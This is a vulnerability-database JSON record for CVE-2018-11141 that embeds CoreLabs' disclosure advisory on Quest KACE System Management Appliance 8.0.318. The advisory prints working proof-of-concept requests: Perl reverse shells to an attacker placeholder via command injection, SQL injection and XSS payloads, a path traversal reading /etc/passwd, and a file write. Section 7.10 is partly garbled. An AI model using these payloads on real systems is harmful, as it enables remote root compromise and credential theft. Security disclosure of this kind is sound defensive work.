CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0601",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11141"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11141",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11141",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-15643",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11141",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11141",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-15643",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1213",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11141",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the \u0027/adminui/advisory.php\u0027 script in the Quest KACE System Management Virtual Appliance 8.0.318 can be abused to write and delete files respectively via Directory Traversal. Files can be at any location where the \u0027www\u0027 user has write permissions. QuestKACESystemManagementVirtualAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in QuestKACESystemManagementVirtualAppliance version 8.0.318. An attacker could use the \u2018IMAGES_JSON\u2019 and \u2018attachments_to_remove[]\u2019 parameters to write and delete files with this vulnerability. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nThe patch can be downloaded at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. 
version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse 
shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). 
\n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. 
*Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 
8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scripting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. 
\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). 
\n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. 
\n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. 
